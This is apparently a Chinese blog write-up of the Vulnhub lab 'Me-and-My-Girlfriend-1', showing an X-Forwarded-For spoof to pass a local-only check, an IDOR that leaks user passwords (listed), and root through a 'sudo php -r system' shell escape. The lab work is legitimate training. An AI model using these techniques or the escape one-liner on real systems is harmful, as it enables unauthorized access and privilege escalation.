【甄选靶场】Vulnhub百个项目渗透——项目四十七:Me-and-My-Girlfriend-1(水平越权)

已于 2022-10-28 11:56:44 修改
阅读量397 收藏 1
点赞数
分类专栏: vulnhub百个项目渗透 文章标签: ubuntu linux 服务器 vulnhub 网络安全
于 2022-10-23 13:23:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127473049
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目四十七:Me-and-My-Girlfriend-1(水平越权)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月23日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

这是作者写的,大致意思就是这个女的给这个男的戴绿帽子
在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)

页面提示如下
在这里插入图片描述在这里我本来想做一个本地hosts的,结果发现没有用,于是我点开了源码
有点草率了,下次应该先搞清楚再动手的

在这里插入图片描述
火狐插件:X-Forwarded-For
打开之后xff设置成127.0.0.1即可

在这里插入图片描述发现这么几个按钮,url可能存在lfi,进行测试
在这里插入图片描述
在这里插入图片描述测试无效,先不管了,先注册个用户看看
在这里插入图片描述注册成功,发现url有关于用户的显示
在这里插入图片描述修改id数值,发现可以获得用户信息
在这里插入图片描述
页面源码可以获得密码,这是非常不安全的

eweuhtandingan     skuyatuh
aingmaung       qwerty!!!
sundatea     indONEsia
sedihaingmah    cedihhihihi
alice    4lic3

因为我们要找Alice就是那个出轨的女人,所以我们直接登录他的账号就行
在这里插入图片描述

在这里插入图片描述在这里插入图片描述
额。。。真tm狗血

提权

先跑了一遍linpeas.sh
sudo -l 发现php可以sudo溢出
在这里插入图片描述
在这里插入图片描述
确定,去网站找个exp,一把梭

在这里插入图片描述

CMD="/bin/sh"
sudo php -r "system('$CMD');"

在这里插入图片描述ok
在这里插入图片描述

find / -name "falg2.txt"   --因为之前是flag1
cat /root/flag2.txt

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
36-3 shiro越权 - shiro越权漏洞复现
weixin_43263566的博客
04-16 98
我们现在访问网站的admin页面,网站会先对我们当前的用户权限进行验证,没有通过就会跳转到登录页面,让我们的登录一个有对应权限的账号。注意:因为靶场会进行权限验证所以访问会比较慢。IP + 8080 端口访问。正常访问admin的情况。加上payload的情况。
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试
Long_gone的博客
01-18 836
一、信息收集 打开靶机后,先用netdiscover进行IP扫描: 确定靶机IP为192.168.1.106后,扫描它的端口开放情况: namp -sV -A -p 0-65535 192.168.1.106 发现靶机只开放了22和80端口,打开80端口看一下: 这段话的意思是:你是谁?黑客吗?对不起,本网站只能在本地访问! 然后试着先扫描一下目录: dirb http://192.168...
vulhub漏洞复现-CouchDB(CVE-2017-12635/6)垂直越权漏洞远程代码执行
遇事不决冲冲冲
11-03 3471
CouchDB Apache CouchDB是一个开源的数据库,面向文档的数据库管理系统,专注易用性"完全使用Web"。使用JSON作为存储格式,JavaScript为查询语言,MapReduce和HTTP作为API的NoSQL数据库 CVE-2017-12635垂直越权漏洞 思路 由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。可用于非管理员用户赋予自身管理员身份权限。 在Erlang: > jiffy:decode(“{“a”:”1″, “a”:”2
Vulhub靶场Couchdb 垂直越权漏洞复现
X_python321的博客
08-07 189
由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。CVE-2017-12635
vulnhub靶场-y0usef笔记
qq_56426046的博客
08-08 479
dirsearch扫目录发现403权限绕过方法dirsearch扫目录发现403权限绕过方法反弹shell失败最后用蚁剑的shell执行命令那些听不见音乐的人认为那些跳舞的人疯了。
靶机测试 Me and My Girlfriend1笔记
qq_56426046的博客
01-08 575
用这个X-Forwarded-For Header插件 再增加上 127.0.0.1 即可绕过。把id修改为1即可获取 id=1 用户的账号和密码。确定靶机地址192.168.1.103。发现 php 不需要密码就可以执行操作。点击个人信息查看源代码可以看见密码。修改id查看是否可以看到别人的密码。发现注册登录和注册页面 注册用户。后来,错过也成了人间常态。
virtual-girlfriend:JavaScript语音识别的简单示例
05-12
"virtual-girlfriend"项目就是一个很好的例子,它展示了如何利用JavaScript实现一个简单的虚拟女朋友,通过语音识别与用户进行互动。下面将详细探讨这个项目的相关知识点。 1. **语音识别技术** 语音识别是让...
Goodmorning-Girlfriend::pig:好吧,没有什么是永恒的,
08-04
项目利用了多种技术的优势,例如 javascript 、 HTML5 、 css 、 scss。 如果我们熟悉这些技术会更好。 先决条件 你需要安装 vue.js 和 node.js。 安装 :umbrella_with_rain_drops: 它非常简单: 克隆回购: ...
Does GPT-4 Know Me Better Than My Girlfriend_.pdf
06-30
这个实验基于作者Dan Shipper的个人尝试,他利用GPT-4来模拟他的行为,并通过他在线上发表的内容和笔记样本来预测其人格特质。他将GPT-4的预测结果与他的实际测试得分以及他女朋友Julia的预测进行比较,以评估AI的...
auto-green:自动保持GitHub提交状态常绿,每天提交一次,让您的女友远离
02-03
标题中的"auto-green"是一个工具,它主要用于自动化GitHub的提交过程,确保用户的GitHub贡献图谱上每天都有一条新的提交记录,使"提交状态常绿"。这个工具特别适合那些希望保持活跃度展示在GitHub上的开发者,或者...
Robots-Stole-My-Girlfriend
07-02
目录doc - 在这里可以找到与项目相关的所有文档(例如 RAD 和会议协议)。 lib - 外部库的文件夹,例如 Slick 和 JDom。 res - 在这里可以找到图像、音频和类似的文件。 src - 所有代码的文件夹。 test - 所有测试类...
甄选靶场Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)
人间体佐菲的博客
09-30 894
甄选靶场Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)网络安全,渗透测试
[Vulfocus解题系列] CouchDB垂直越权漏洞(CVE-2017-12635)
00勇士王子的博客
07-11 718
漏洞介绍 解题过程 1.打开题目环境 2.使用nc监听端口,用于接收漏洞环境的反弹Shell 3.
使用vulhub进行漏洞环境搭建
DaWan
09-21 1202
使用vulhub进行漏洞环境搭建下载vulhub环境启动 下载vulhub vulhub下载地址: https://github.com/vulhub/vulhub 命令: git clone https://github.com/vulhub/vulhub 下载完成后可以查看里面有很多漏洞的环境,想用哪个就用哪个,超级方便~ 每个漏洞里面都有详细的介绍: 环境启动 命令:docker-compose up -d 启动之后就具备相应的漏洞环境啦,接下来就可以复现漏洞 命令 详解 docke
Ubuntu与Windows之间的复制粘贴和文件拖拽
willhu2008的专栏
07-05 201
打开虚拟机Ubuntu的终端,输入命令: 出现了问题2: 1中命令后:更新apt: 更多方法可参考: https://www.cnblogs.com/smqh-bokeyuan/p/18084863然后重启Ubuntu。在ubuntu终端执行命令: 重启Ubuntu后,就可以了。注意:Ubuntu要在联网状态。
ubuntu运行qq音乐闪退
Q95470的博客
07-03 371
该文件有可能是只读,权限不够的话用sudo vim qqmusic.desktop。
Ubuntu22.04系统装好后左上角下划线闪烁不开机(N卡)
qq_31638535的博客
07-09 87
Ubuntu系统安装
Ubuntu 24.04 LTS (Linux) 安装二维码生成工具 QRencode 二维码生成和识别
最新发布
tonyhi6的博客
07-10 160
可以下载test.png图片,用手机浏览器扫描下看(⊙﹏⊙)1 Ubuntu 安装。
保姆级教程:Linux (Ubuntu) 部署流光卡片开源 API
梦染 * 星尘 的博客
07-09 433
流光卡片 API 开源地址 Github:https://github.com/ygh3279799773/streamer-card流光卡片 API 开源地址 Gitee:https://gitee.com/y-gh/streamer-card流光卡片在线使用地址:https://fireflycard.shushiai.com/想要使用 api 调用服务,需要有一个服务器来时刻监听请求。服务器终端界面阅读不方便,因此需要使用宝塔面板进行管理。
7-4 女友标准(结构体)
05-25
以下是一个示例的女友标准结构体: ```c #include // 定义女友标准结构体 struct girlfriend_criteria { char name[20]; int age; float height; float weight; char hobby[50]; }; int main() { // 初始...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值